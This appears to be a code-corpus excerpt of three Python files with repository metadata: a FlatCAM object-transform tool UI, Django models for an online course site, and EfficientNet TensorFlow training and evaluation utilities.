except Exception as e:
self.app.inform.emit('[ERROR_NOTCL] %s: %s.' % (_("Action was not executed"), str(e)))
return
def on_buffer_action(self, value, join, factor=None):
obj_list = self.app.collection.get_selected()
if not obj_list:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("No object is selected."))
return
else:
with self.app.proc_container.new(_("Applying Buffer")):
try:
for sel_obj in obj_list:
if sel_obj.kind == 'cncjob':
self.app.inform.emit(_("CNCJob objects can't be buffered."))
elif sel_obj.kind.lower() == 'gerber':
sel_obj.buffer(value, join, factor)
sel_obj.source_file = self.app.f_handlers.export_gerber(obj_name=sel_obj.options['name'],
filename=None, local_use=sel_obj,
use_thread=False)
elif sel_obj.kind.lower() == 'excellon':
sel_obj.buffer(value, join, factor)
sel_obj.source_file = self.app.f_handlers.export_excellon(obj_name=sel_obj.options['name'],
filename=None, local_use=sel_obj,
use_thread=False)
elif sel_obj.kind.lower() == 'geometry':
sel_obj.buffer(value, join, factor)
self.app.app_obj.object_changed.emit(sel_obj)
sel_obj.plot()
self.app.inform.emit('[success] %s...' % _('Buffer done'))
except Exception as e:
self.app.log.debug("ToolTransform.on_buffer_action() --> %s" % str(e))
self.app.inform.emit('[ERROR_NOTCL] %s: %s.' % (_("Action was not executed"), str(e)))
return
@staticmethod
def alt_bounds(obj_list):
"""
Returns coordinates of rectangular bounds
of an object with geometry: (xmin, ymin, xmax, ymax).
"""
def bounds_rec(lst):
minx = np.Inf
miny = np.Inf
maxx = -np.Inf
maxy = -np.Inf
try:
for obj in lst:
if obj.kind != 'cncjob':
minx_, miny_, maxx_, maxy_ = bounds_rec(obj)
minx = min(minx, minx_)
miny = min(miny, miny_)
maxx = max(maxx, maxx_)
maxy = max(maxy, maxy_)
return minx, miny, maxx, maxy
except TypeError:
# it's an object, return it's bounds
return lst.bounds()
return bounds_rec(obj_list)
class TransformUI:
toolName = _("Object Transform")
rotateName = _("Rotate")
skewName = _("Skew/Shear")
scaleName = _("Scale")
flipName = _("Mirror (Flip)")
offsetName = _("Offset")
bufferName = _("Buffer")
def __init__(self, layout, app):
self.app = app
self.decimals = self.app.decimals
self.layout = layout
# ## Title
title_label = FCLabel("%s" % self.toolName)
title_label.setStyleSheet("""
QLabel
{
font-size: 16px;
font-weight: bold;
}
""")
self.layout.addWidget(title_label)
self.layout.addWidget(FCLabel(""))
# ## Layout
grid0 = QtWidgets.QGridLayout()
self.layout.addLayout(grid0)
grid0.setColumnStretch(0, 0)
grid0.setColumnStretch(1, 1)
grid0.setColumnStretch(2, 0)
grid0.addWidget(FCLabel(''))
# Reference
ref_label = FCLabel('%s:' % _("Reference"))
ref_label.setToolTip(
_("The reference point for Rotate, Skew, Scale, Mirror.\n"
"Can be:\n"
"- Origin -> it is the 0, 0 point\n"
"- Selection -> the center of the bounding box of the selected objects\n"
"- Point -> a custom point defined by X,Y coordinates\n"
"- Object -> the center of the bounding box of a specific object")
)
self.ref_combo = FCComboBox()
self.ref_items = [_("Origin"), _("Selection"), _("Point"), _("Object")]
self.ref_combo.addItems(self.ref_items)
grid0.addWidget(ref_label, 0, 0)
grid0.addWidget(self.ref_combo, 0, 1, 1, 2)
self.point_label = FCLabel('%s:' % _("Value"))
self.point_label.setToolTip(
_("A point of reference in format X,Y.")
)
self.point_entry = NumericalEvalTupleEntry()
grid0.addWidget(self.point_label, 1, 0)
grid0.addWidget(self.point_entry, 1, 1, 1, 2)
self.point_button = FCButton(_("Add"))
self.point_button.setToolTip(
_("Add point coordinates from clipboard.")
)
grid0.addWidget(self.point_button, 2, 0, 1, 3)
# Type of object to be used as reference
self.type_object_label = FCLabel('%s:' % _("Type"))
self.type_object_label.setToolTip(
_("The type of object used as reference.")
)
self.type_obj_combo = FCComboBox()
self.type_obj_combo.addItem(_("Gerber"))
self.type_obj_combo.addItem(_("Excellon"))
self.type_obj_combo.addItem(_("Geometry"))
self.type_obj_combo.setItemIcon(0, QtGui.QIcon(self.app.resource_location + "/flatcam_icon16.png"))
self.type_obj_combo.setItemIcon(1, QtGui.QIcon(self.app.resource_location + "/drill16.png"))
self.type_obj_combo.setItemIcon(2, QtGui.QIcon(self.app.resource_location + "/geometry16.png"))
grid0.addWidget(self.type_object_label, 3, 0)
grid0.addWidget(self.type_obj_combo, 3, 1, 1, 2)
# Object to be used as reference
self.object_combo = FCComboBox()
self.object_combo.setModel(self.app.collection)
self.object_combo.setRootModelIndex(self.app.collection.index(0, 0, QtCore.QModelIndex()))
self.object_combo.is_last = True
self.object_combo.setToolTip(
_("The object used as reference.\n"
"The used point is the center of it's bounding box.")
)
grid0.addWidget(self.object_combo, 4, 0, 1, 3)
separator_line = QtWidgets.QFrame()
separator_line.setFrameShape(QtWidgets.QFrame.HLine)
separator_line.setFrameShadow(QtWidgets.QFrame.Sunken)
grid0.addWidget(separator_line, 5, 0, 1, 3)
# ## Rotate Title
rotate_title_label = FCLabel("<font size=3><b>%s</b></font>" % self.rotateName)
grid0.addWidget(rotate_title_label, 6, 0, 1, 3)
self.rotate_label = FCLabel('%s:' % _("Angle"))
self.rotate_label.setToolTip(
_("Angle, in degrees.\n"
"Float number between -360 and 359.\n"
"Positive numbers for CW motion.\n"
"Negative numbers for CCW motion.")
)
self.rotate_entry = FCDoubleSpinner(callback=self.confirmation_message)
self.rotate_entry.set_precision(self.decimals)
self.rotate_entry.setSingleStep(45)
self.rotate_entry.setWrapping(True)
self.rotate_entry.set_range(-360, 360)
# self.rotate_entry.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self.rotate_button = FCButton(_("Rotate"))
self.rotate_button.setToolTip(
_("Rotate the selected object(s).\n"
"The point of reference is the middle of\n"
"the bounding box for all selected objects.")
)
self.rotate_button.setMinimumWidth(90)
grid0.addWidget(self.rotate_label, 7, 0)
grid0.addWidget(self.rotate_entry, 7, 1)
grid0.addWidget(self.rotate_button, 7, 2)
separator_line = QtWidgets.QFrame()
separator_line.setFrameShape(QtWidgets.QFrame.HLine)
separator_line.setFrameShadow(QtWidgets.QFrame.Sunken)
grid0.addWidget(separator_line, 8, 0, 1, 3)
# ## Skew Title
skew_title_label = FCLabel("<font size=3><b>%s</b></font>" % self.skewName)
grid0.addWidget(skew_title_label, 9, 0, 1, 2)
self.skew_link_cb = FCCheckBox()
self.skew_link_cb.setText(_("Link"))
self.skew_link_cb.setToolTip(
_("Link the Y entry to X entry and copy its content.")
)
grid0.addWidget(self.skew_link_cb, 9, 2)
self.skewx_label = FCLabel('%s:' % _("X angle"))
self.skewx_label.setToolTip(
_("Angle for Skew action, in degrees.\n"
"Float number between -360 and 360.")
)
self.skewx_entry = FCDoubleSpinner(callback=self.confirmation_message)
# self.skewx_entry.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self.skewx_entry.set_precision(self.decimals)
self.skewx_entry.set_range(-360, 360)
self.skewx_button = FCButton(_("Skew X"))
self.skewx_button.setToolTip(
_("Skew/shear the selected object(s).\n"
"The point of reference is the middle of\n"
"the bounding box for all selected objects."))
self.skewx_button.setMinimumWidth(90)
grid0.addWidget(self.skewx_label, 10, 0)
grid0.addWidget(self.skewx_entry, 10, 1)
grid0.addWidget(self.skewx_button, 10, 2)
self.skewy_label = FCLabel('%s:' % _("Y angle"))
self.skewy_label.setToolTip(
_("Angle for Skew action, in degrees.\n"
"Float number between -360 and 360.")
)
self.skewy_entry = FCDoubleSpinner(callback=self.confirmation_message)
# self.skewy_entry.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self.skewy_entry.set_precision(self.decimals)
self.skewy_entry.set_range(-360, 360)
self.skewy_button = FCButton(_("Skew Y"))
self.skewy_button.setToolTip(
_("Skew/shear the selected object(s).\n"
"The point of reference is the middle of\n"
"the bounding box for all selected objects."))
self.skewy_button.setMinimumWidth(90)
grid0.addWidget(self.skewy_label, 12, 0)
grid0.addWidget(self.skewy_entry, 12, 1)
grid0.addWidget(self.skewy_button, 12, 2)
self.ois_sk = OptionalInputSection(self.skew_link_cb, [self.skewy_label, self.skewy_entry, self.skewy_button],
logic=False)
separator_line = QtWidgets.QFrame()
separator_line.setFrameShape(QtWidgets.QFrame.HLine)
separator_line.setFrameShadow(QtWidgets.QFrame.Sunken)
grid0.addWidget(separator_line, 14, 0, 1, 3)
# ## Scale Title
scale_title_label = FCLabel("<font size=3><b>%s</b></font>" % self.scaleName)
grid0.addWidget(scale_title_label, 15, 0, 1, 2)
self.scale_link_cb = FCCheckBox()
self.scale_link_cb.setText(_("Link"))
self.scale_link_cb.setToolTip(
_("Link the Y entry to X entry and copy its content.")
)
grid0.addWidget(self.scale_link_cb, 15, 2)
self.scalex_label = FCLabel('%s:' % _("X factor"))
self.scalex_label.setToolTip(
_("Factor for scaling on X axis.")
)
self.scalex_entry = FCDoubleSpinner(callback=self.confirmation_message)
# self.scalex_entry.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self.scalex_entry.set_precision(self.decimals)
self.scalex_entry.setMinimum(-1e6)
self.scalex_button = FCButton(_("Scale X"))
self.scalex_button.setToolTip(
_("Scale the selected object(s).\n"
"The point of reference depends on \n"
"the Scale reference checkbox state."))
self.scalex_button.setMinimumWidth(90)
grid0.addWidget(self.scalex_label, 17, 0)
grid0.addWidget(self.scalex_entry, 17, 1)
grid0.addWidget(self.scalex_button, 17, 2)
self.scaley_label = FCLabel('%s:' % _("Y factor"))
self.scaley_label.setToolTip(
_("Factor for scaling on Y axis.")
)
self.scaley_entry = FCDoubleSpinner(callback=self.confirmation_message)
# self.scaley_entry.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self.scaley_entry.set_precision(self.decimals)
self.scaley_entry.setMinimum(-1e6)
self.scaley_button = FCButton(_("Scale Y"))
self.scaley_button.setToolTip(
_("Scale the selected object(s).\n"
"The point of reference depends on \n"
"the Scale reference checkbox state."))
self.scaley_button.setMinimumWidth(90)
grid0.addWidget(self.scaley_label, 19, 0)
grid0.addWidget(self.scaley_entry, 19, 1)
grid0.addWidget(self.scaley_button, 19, 2)
self.ois_s = OptionalInputSection(self.scale_link_cb,
[
self.scaley_label,
self.scaley_entry,
self.scaley_button
], logic=False)
separator_line = QtWidgets.QFrame()
separator_line.setFrameShape(QtWidgets.QFrame.HLine)
separator_line.setFrameShadow(QtWidgets.QFrame.Sunken)
grid0.addWidget(separator_line, 21, 0, 1, 3)
# ## Flip Title
flip_title_label = FCLabel("<font size=3><b>%s</b></font>" % self.flipName)
grid0.addWidget(flip_title_label, 23, 0, 1, 3)
self.flipx_button = FCButton(_("Flip on X"))
self.flipx_button.setToolTip(
_("Flip the selected object(s) over the X axis.")
)
self.flipy_button = FCButton(_("Flip on Y"))
self.flipy_button.setToolTip(
_("Flip the selected object(s) over the X axis.")
)
hlay0 = QtWidgets.QHBoxLayout()
grid0.addLayout(hlay0, 25, 0, 1, 3)
hlay0.addWidget(self.flipx_button)
hlay0.addWidget(self.flipy_button)
separator_line = QtWidgets.QFrame()
separator_line.setFrameShape(QtWidgets.QFrame.HLine)
separator_line.setFrameShadow(QtWidgets.QFrame.Sunken)
grid0.addWidget(separator_line, 27, 0, 1, 3)
# ## Offset Title
offset_title_label = FCLabel("<font size=3><b>%s</b></font>" % self.offsetName)
grid0.addWidget(offset_title_label, 29, 0, 1, 3)
self.offx_label = FCLabel('%s:' % _("X val"))
self.offx_label.setToolTip(
_("Distance to offset on X axis. In current units.")
)
self.offx_entry = FCDoubleSpinner(callback=self.confirmation_message)
# self.offx_entry.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self.offx_entry.set_precision(self.decimals)
self.offx_entry.setMinimum(-1e6)
self.offx_button = FCButton(_("Offset X"))
self.offx_button.setToolTip(
_("Offset the selected object(s).\n"
"The point of reference is the middle of\n"
"the bounding box for all selected objects.\n"))
self.offx_button.setMinimumWidth(90)
grid0.addWidget(self.offx_label, 31, 0)
grid0.addWidget(self.offx_entry, 31, 1)
grid0.addWidget(self.offx_button, 31, 2)
self.offy_label = FCLabel('%s:' % _("Y val"))
self.offy_label.setToolTip(
_("Distance to offset on Y axis. In current units.")
)
self.offy_entry = FCDoubleSpinner(callback=self.confirmation_message)
# self.offy_entry.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self.offy_entry.set_precision(self.decimals)
self.offy_entry.setMinimum(-1e6)
self.offy_button = FCButton(_("Offset Y"))
self.offy_button.setToolTip(
_("Offset the selected object(s).\n"
"The point of reference is the middle of\n"
"the bounding box for all selected objects.\n"))
self.offy_button.setMinimumWidth(90)
grid0.addWidget(self.offy_label, 32, 0)
grid0.addWidget(self.offy_entry, 32, 1)
grid0.addWidget(self.offy_button, 32, 2)
separator_line = QtWidgets.QFrame()
separator_line.setFrameShape(QtWidgets.QFrame.HLine)
separator_line.setFrameShadow(QtWidgets.QFrame.Sunken)
grid0.addWidget(separator_line, 34, 0, 1, 3)
# ## Buffer Title
buffer_title_label = FCLabel("<font size=3><b>%s</b></font>" % self.bufferName)
grid0.addWidget(buffer_title_label, 35, 0, 1, 2)
self.buffer_rounded_cb = FCCheckBox('%s' % _("Rounded"))
self.buffer_rounded_cb.setToolTip(
_("If checked then the buffer will surround the buffered shape,\n"
"every corner will be rounded.\n"
"If not checked then the buffer will follow the exact geometry\n"
"of the buffered shape.")
)
grid0.addWidget(self.buffer_rounded_cb, 35, 2)
self.buffer_label = FCLabel('%s:' % _("Distance"))
self.buffer_label.setToolTip(
_("A positive value will create the effect of dilation,\n"
"while a negative value will create the effect of erosion.\n"
"Each geometry element of the object will be increased\n"
"or decreased with the 'distance'.")
)
self.buffer_entry = FCDoubleSpinner(callback=self.confirmation_message)
self.buffer_entry.set_precision(self.decimals)
self.buffer_entry.setSingleStep(0.1)
self.buffer_entry.setWrapping(True)
self.buffer_entry.set_range(-10000.0000, 10000.0000)
self.buffer_button = FCButton(_("Buffer D"))
self.buffer_button.setToolTip(
_("Create the buffer effect on each geometry,\n"
"element from the selected object, using the distance.")
)
self.buffer_button.setMinimumWidth(90)
grid0.addWidget(self.buffer_label, 37, 0)
grid0.addWidget(self.buffer_entry, 37, 1)
grid0.addWidget(self.buffer_button, 37, 2)
self.buffer_factor_label = FCLabel('%s:' % _("Value"))
self.buffer_factor_label.setToolTip(
_("A positive value will create the effect of dilation,\n"
"while a negative value will create the effect of erosion.\n"
"Each geometry element of the object will be increased\n"
"or decreased to fit the 'Value'. Value is a percentage\n"
"of the initial dimension.")
)
self.buffer_factor_entry = FCDoubleSpinner(callback=self.confirmation_message, suffix='%')
self.buffer_factor_entry.set_range(-100.0000, 1000.0000)
self.buffer_factor_entry.set_precision(self.decimals)
self.buffer_factor_entry.setWrapping(True)
self.buffer_factor_entry.setSingleStep(1)
self.buffer_factor_button = FCButton(_("Buffer F"))
self.buffer_factor_button.setToolTip(
_("Create the buffer effect on each geometry,\n"
"element from the selected object, using the factor.")
)
self.buffer_factor_button.setMinimumWidth(90)
grid0.addWidget(self.buffer_factor_label, 38, 0)
grid0.addWidget(self.buffer_factor_entry, 38, 1)
grid0.addWidget(self.buffer_factor_button, 38, 2)
grid0.addWidget(FCLabel(''), 42, 0, 1, 3)
self.layout.addStretch()
# ## Reset Tool
self.reset_button = FCButton(_("Reset Tool"))
self.reset_button.setIcon(QtGui.QIcon(self.app.resource_location + '/reset32.png'))
self.reset_button.setToolTip(
_("Will reset the tool parameters.")
)
self.reset_button.setStyleSheet("""
QPushButton
{
font-weight: bold;
}
""")
self.layout.addWidget(self.reset_button)
# #################################### FINSIHED GUI ###########################
# #############################################################################
def on_reference_changed(self, index):
if index == 0 or index == 1: # "Origin" or "Selection" reference
self.point_label.hide()
self.point_entry.hide()
self.point_button.hide()
self.type_object_label.hide()
self.type_obj_combo.hide()
self.object_combo.hide()
elif index == 2: # "Point" reference
self.point_label.show()
self.point_entry.show()
self.point_button.show()
self.type_object_label.hide()
self.type_obj_combo.hide()
self.object_combo.hide()
else: # "Object" reference
self.point_label.hide()
self.point_entry.hide()
self.point_button.hide()
self.type_object_label.show()
self.type_obj_combo.show()
self.object_combo.show()
def confirmation_message(self, accepted, minval, maxval):
if accepted is False:
self.app.inform[str, bool].emit('[WARNING_NOTCL] %s: [%.*f, %.*f]' % (_("Edited value is out of range"),
self.decimals,
minval,
self.decimals,
maxval), False)
else:
self.app.inform[str, bool].emit('[success] %s' % _("Edited value is within limits."), False)
def confirmation_message_int(self, accepted, minval, maxval):
if accepted is False:
self.app.inform[str, bool].emit('[WARNING_NOTCL] %s: [%d, %d]' %
(_("Edited value is out of range"), minval, maxval), False)
else:
self.app.inform[str, bool].emit('[success] %s' % _("Edited value is within limits."), False)
| 42.599178 | 119 | 0.553958 |
5dda636f1aa861540b9631bc41688824b15dc263 | 2,704 | py | Python | simplemooc/courses/models.py | leorzz/simplemooc | 8b1c5e939d534b1fd729596df4c59fc69708b896 | [
"MIT"
] | null | null | null | simplemooc/courses/models.py | leorzz/simplemooc | 8b1c5e939d534b1fd729596df4c59fc69708b896 | [
"MIT"
] | null | null | null | simplemooc/courses/models.py | leorzz/simplemooc | 8b1c5e939d534b1fd729596df4c59fc69708b896 | [
"MIT"
] | null | null | null | # -*- coding: utf 8 -*-
from django.db import models
from django.conf import settings
# Custom manager
class CourseManager(models.Manager):
# Filtro do batabase
def search(self, query):
return self.get_queryset().filter(
#name__icontains=query, description__icontains=query # and
#models.Q(name__icontains=query) & models.Q(description__icontains=query) # end
models.Q(name__icontains=query) | models.Q(description__icontains=query) # or
)
# https://docs.djangoproject.com/en/1.11/ref/models/instances/
class Course(models.Model):
name = models.CharField('Nome', max_length=100)
slug = models.SlugField('Atalho')
description = models.TextField('Descricao',blank=True)
about = models.TextField('Sobre o curso', blank=True)
start_date = models.DateField('Data de Início', null=True, blank=True)
image = models.ImageField(upload_to='courses/images', verbose_name='Imagem', null=True, blank=True)
created_at = models.DateTimeField('Criado em', auto_now_add=True)
updated_at = models.DateTimeField('Atualizado em', auto_now=True)
objects = CourseManager()
# The __str__() method is called whenever you call str() on an object
# Mostra o atributo nome do curso ao invés do objeto.
def __str__(self):
return self.name
@models.permalink
def get_absolute_url(self):
#from django.core.urlresolvers import reverse # ja esta incluido
return ('courses:details', (), ({'slug': self.slug}))
class Meta:
verbose_name = 'Curso'
verbose_name_plural = 'Cursos'
ordering = ['name'] # cres
#ordering = ['-name'] # decres
class Enrollment(models.Model):
STATUS_CHOICES = (
(0, 'Pendente'),
(1, 'Aprovado'),
(2, 'Cancelado'),
)
user = models.ForeignKey(
settings.AUTH_USER_MODEL, verbose_name='Usuário',
related_name='enrollments'
)
course = models.ForeignKey(
Course, verbose_name='Curso', related_name='enrollments'
)
status = models.IntegerField('Situação', choices=STATUS_CHOICES, default=1, blank=True)
created_at = models.DateTimeField('Criado em', auto_now_add=True)
updated_at = models.DateTimeField('Atualizado em', auto_now=True)
def active(self):
self.status = 1
self.save()
class Meta:
verbose_name = 'Inscrição'
verbose_name_plural = 'Inscrições'
unique_together = (('user','course'),) # Usado para indicar unicidade. Apenas poderá existir um 'Enrollment' com par user e course
| 36.053333 | 138 | 0.640902 |
8bd389e140e7ad94a04704fe8a4c6d3a22ce8f70 | 15,467 | py | Python | libs/networks/efficientnet/utils.py | graceon/R3Det_Tensorflow | 5ff8e2505aacfb9107d2c41980374385dc0200ba | [
"MIT"
] | 3 | 2020-04-29T11:55:23.000Z | 2020-07-01T08:59:44.000Z | libs/networks/efficientnet/utils.py | graceon/R3Det_Tensorflow | 5ff8e2505aacfb9107d2c41980374385dc0200ba | [
"MIT"
] | 1 | 2021-02-06T15:50:57.000Z | 2021-02-06T15:50:57.000Z | libs/networks/efficientnet/utils.py | graceon/R3Det_Tensorflow | 5ff8e2505aacfb9107d2c41980374385dc0200ba | [
"MIT"
] | 1 | 2020-11-24T05:23:56.000Z | 2020-11-24T05:23:56.000Z | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import sys
from absl import logging
import numpy as np
import tensorflow as tf
def build_learning_rate(initial_lr,
global_step,
steps_per_epoch=None,
lr_decay_type='exponential',
decay_factor=0.97,
decay_epochs=2.4,
total_steps=None,
warmup_epochs=5):
"""Build learning rate."""
if lr_decay_type == 'exponential':
assert steps_per_epoch is not None
decay_steps = steps_per_epoch * decay_epochs
lr = tf.train.exponential_decay(
initial_lr, global_step, decay_steps, decay_factor, staircase=True)
elif lr_decay_type == 'cosine':
assert total_steps is not None
lr = 0.5 * initial_lr * (
1 + tf.cos(np.pi * tf.cast(global_step, tf.float32) / total_steps))
elif lr_decay_type == 'constant':
lr = initial_lr
else:
assert False, 'Unknown lr_decay_type : %s' % lr_decay_type
if warmup_epochs:
logging.info('Learning rate warmup_epochs: %d', warmup_epochs)
warmup_steps = int(warmup_epochs * steps_per_epoch)
warmup_lr = (
initial_lr * tf.cast(global_step, tf.float32) / tf.cast(
warmup_steps, tf.float32))
lr = tf.cond(global_step < warmup_steps, lambda: warmup_lr, lambda: lr)
return lr
def build_optimizer(learning_rate,
optimizer_name='rmsprop',
decay=0.9,
epsilon=0.001,
momentum=0.9):
"""Build optimizer."""
if optimizer_name == 'sgd':
logging.info('Using SGD optimizer')
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
elif optimizer_name == 'momentum':
logging.info('Using Momentum optimizer')
optimizer = tf.train.MomentumOptimizer(
learning_rate=learning_rate, momentum=momentum)
elif optimizer_name == 'rmsprop':
logging.info('Using RMSProp optimizer')
optimizer = tf.train.RMSPropOptimizer(learning_rate, decay, momentum,
epsilon)
else:
logging.fatal('Unknown optimizer: %s', optimizer_name)
return optimizer
class TpuBatchNormalization(tf.layers.BatchNormalization):
# class TpuBatchNormalization(tf.layers.BatchNormalization):
"""Cross replica batch normalization."""
def __init__(self, fused=False, **kwargs):
if fused in (True, None):
raise ValueError('TpuBatchNormalization does not support fused=True.')
super(TpuBatchNormalization, self).__init__(fused=fused, **kwargs)
def _cross_replica_average(self, t, num_shards_per_group):
"""Calculates the average value of input tensor across TPU replicas."""
num_shards = tpu_function.get_tpu_context().number_of_shards
group_assignment = None
if num_shards_per_group > 1:
if num_shards % num_shards_per_group != 0:
raise ValueError('num_shards: %d mod shards_per_group: %d, should be 0'
% (num_shards, num_shards_per_group))
num_groups = num_shards // num_shards_per_group
group_assignment = [[
x for x in range(num_shards) if x // num_shards_per_group == y
] for y in range(num_groups)]
return tf.tpu.cross_replica_sum(t, group_assignment) / tf.cast(
num_shards_per_group, t.dtype)
def _moments(self, inputs, reduction_axes, keep_dims):
"""Compute the mean and variance: it overrides the original _moments."""
shard_mean, shard_variance = super(TpuBatchNormalization, self)._moments(
inputs, reduction_axes, keep_dims=keep_dims)
num_shards = tpu_function.get_tpu_context().number_of_shards or 1
if num_shards <= 8: # Skip cross_replica for 2x2 or smaller slices.
num_shards_per_group = 1
else:
num_shards_per_group = max(8, num_shards // 8)
logging.info('TpuBatchNormalization with num_shards_per_group %s',
num_shards_per_group)
if num_shards_per_group > 1:
# Compute variance using: Var[X]= E[X^2] - E[X]^2.
shard_square_of_mean = tf.math.square(shard_mean)
shard_mean_of_square = shard_variance + shard_square_of_mean
group_mean = self._cross_replica_average(
shard_mean, num_shards_per_group)
group_mean_of_square = self._cross_replica_average(
shard_mean_of_square, num_shards_per_group)
group_variance = group_mean_of_square - tf.math.square(group_mean)
return (group_mean, group_variance)
else:
return (shard_mean, shard_variance)
class BatchNormalization(tf.layers.BatchNormalization):
"""Fixed default name of BatchNormalization to match TpuBatchNormalization."""
def __init__(self, name='tpu_batch_normalization', **kwargs):
super(BatchNormalization, self).__init__(name=name, **kwargs)
def drop_connect(inputs, is_training, drop_connect_rate):
"""Apply drop connect."""
if not is_training:
return inputs
# Compute keep_prob
# TODO(tanmingxing): add support for training progress.
keep_prob = 1.0 - drop_connect_rate
# Compute drop_connect tensor
batch_size = tf.shape(inputs)[0]
random_tensor = keep_prob
random_tensor += tf.random_uniform([batch_size, 1, 1, 1], dtype=inputs.dtype)
binary_tensor = tf.floor(random_tensor)
output = tf.div(inputs, keep_prob) * binary_tensor
return output
def archive_ckpt(ckpt_eval, ckpt_objective, ckpt_path):
"""Archive a checkpoint if the metric is better."""
ckpt_dir, ckpt_name = os.path.split(ckpt_path)
saved_objective_path = os.path.join(ckpt_dir, 'best_objective.txt')
saved_objective = float('-inf')
if tf.gfile.Exists(saved_objective_path):
with tf.gfile.GFile(saved_objective_path, 'r') as f:
saved_objective = float(f.read())
if saved_objective > ckpt_objective:
logging.info('Ckpt %s is worse than %s', ckpt_objective, saved_objective)
return False
filenames = tf.gfile.Glob(ckpt_path + '.*')
if filenames is None:
logging.info('No files to copy for checkpoint %s', ckpt_path)
return False
# Clear the old folder.
dst_dir = os.path.join(ckpt_dir, 'archive')
if tf.gfile.Exists(dst_dir):
tf.gfile.DeleteRecursively(dst_dir)
tf.gfile.MakeDirs(dst_dir)
# Write checkpoints.
for f in filenames:
dest = os.path.join(dst_dir, os.path.basename(f))
tf.gfile.Copy(f, dest, overwrite=True)
ckpt_state = tf.train.generate_checkpoint_state_proto(
dst_dir,
model_checkpoint_path=ckpt_name,
all_model_checkpoint_paths=[ckpt_name])
with tf.gfile.GFile(os.path.join(dst_dir, 'checkpoint'), 'w') as f:
f.write(str(ckpt_state))
with tf.gfile.GFile(os.path.join(dst_dir, 'best_eval.txt'), 'w') as f:
f.write('%s' % ckpt_eval)
# Update the best objective.
with tf.gfile.GFile(saved_objective_path, 'w') as f:
f.write('%f' % ckpt_objective)
logging.info('Copying checkpoint %s to %s', ckpt_path, dst_dir)
return True
def get_ema_vars():
"""Get all exponential moving average (ema) variables."""
ema_vars = tf.trainable_variables() + tf.get_collection('moving_vars')
for v in tf.global_variables():
# We maintain mva for batch norm moving mean and variance as well.
if 'moving_mean' in v.name or 'moving_variance' in v.name:
ema_vars.append(v)
return list(set(ema_vars))
class DepthwiseConv2D(tf.keras.layers.DepthwiseConv2D, tf.layers.Layer):
"""Wrap keras DepthwiseConv2D to tf.layers."""
pass
class EvalCkptDriver(object):
"""A driver for running eval inference.
Attributes:
model_name: str. Model name to eval.
batch_size: int. Eval batch size.
image_size: int. Input image size, determined by model name.
num_classes: int. Number of classes, default to 1000 for ImageNet.
include_background_label: whether to include extra background label.
"""
def __init__(self,
model_name,
batch_size=1,
image_size=224,
num_classes=1000,
include_background_label=False):
"""Initialize internal variables."""
self.model_name = model_name
self.batch_size = batch_size
self.num_classes = num_classes
self.include_background_label = include_background_label
self.image_size = image_size
def restore_model(self, sess, ckpt_dir, enable_ema=True, export_ckpt=None):
"""Restore variables from checkpoint dir."""
sess.run(tf.global_variables_initializer())
checkpoint = tf.train.latest_checkpoint(ckpt_dir)
if enable_ema:
ema = tf.train.ExponentialMovingAverage(decay=0.0)
ema_vars = get_ema_vars()
var_dict = ema.variables_to_restore(ema_vars)
ema_assign_op = ema.apply(ema_vars)
else:
var_dict = get_ema_vars()
ema_assign_op = None
tf.train.get_or_create_global_step()
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(var_dict, max_to_keep=1)
saver.restore(sess, checkpoint)
if export_ckpt:
if ema_assign_op is not None:
sess.run(ema_assign_op)
saver = tf.train.Saver(max_to_keep=1, save_relative_paths=True)
saver.save(sess, export_ckpt)
def build_model(self, features, is_training):
"""Build model with input features."""
del features, is_training
raise ValueError('Must be implemented by subclasses.')
def get_preprocess_fn(self):
raise ValueError('Must be implemented by subclsses.')
def build_dataset(self, filenames, labels, is_training):
"""Build input dataset."""
batch_drop_remainder = False
if 'condconv' in self.model_name and not is_training:
# CondConv layers can only be called with known batch dimension. Thus, we
# must drop all remaining examples that do not make up one full batch.
# To ensure all examples are evaluated, use a batch size that evenly
# divides the number of files.
batch_drop_remainder = True
num_files = len(filenames)
if num_files % self.batch_size != 0:
tf.logging.warn('Remaining examples in last batch are not being '
'evaluated.')
filenames = tf.constant(filenames)
labels = tf.constant(labels)
dataset = tf.data.Dataset.from_tensor_slices((filenames, labels))
def _parse_function(filename, label):
image_string = tf.read_file(filename)
preprocess_fn = self.get_preprocess_fn()
image_decoded = preprocess_fn(
image_string, is_training, image_size=self.image_size)
image = tf.cast(image_decoded, tf.float32)
return image, label
dataset = dataset.map(_parse_function)
dataset = dataset.batch(self.batch_size,
drop_remainder=batch_drop_remainder)
iterator = dataset.make_one_shot_iterator()
images, labels = iterator.get_next()
return images, labels
def run_inference(self,
ckpt_dir,
image_files,
labels,
enable_ema=True,
export_ckpt=None):
"""Build and run inference on the target images and labels."""
label_offset = 1 if self.include_background_label else 0
with tf.Graph().as_default(), tf.Session() as sess:
images, labels = self.build_dataset(image_files, labels, False)
probs = self.build_model(images, is_training=False)
if isinstance(probs, tuple):
probs = probs[0]
self.restore_model(sess, ckpt_dir, enable_ema, export_ckpt)
prediction_idx = []
prediction_prob = []
for _ in range(len(image_files) // self.batch_size):
out_probs = sess.run(probs)
idx = np.argsort(out_probs)[::-1]
prediction_idx.append(idx[:5] - label_offset)
prediction_prob.append([out_probs[pid] for pid in idx[:5]])
# Return the top 5 predictions (idx and prob) for each image.
return prediction_idx, prediction_prob
def eval_example_images(self,
ckpt_dir,
image_files,
labels_map_file,
enable_ema=True,
export_ckpt=None):
"""Eval a list of example images.
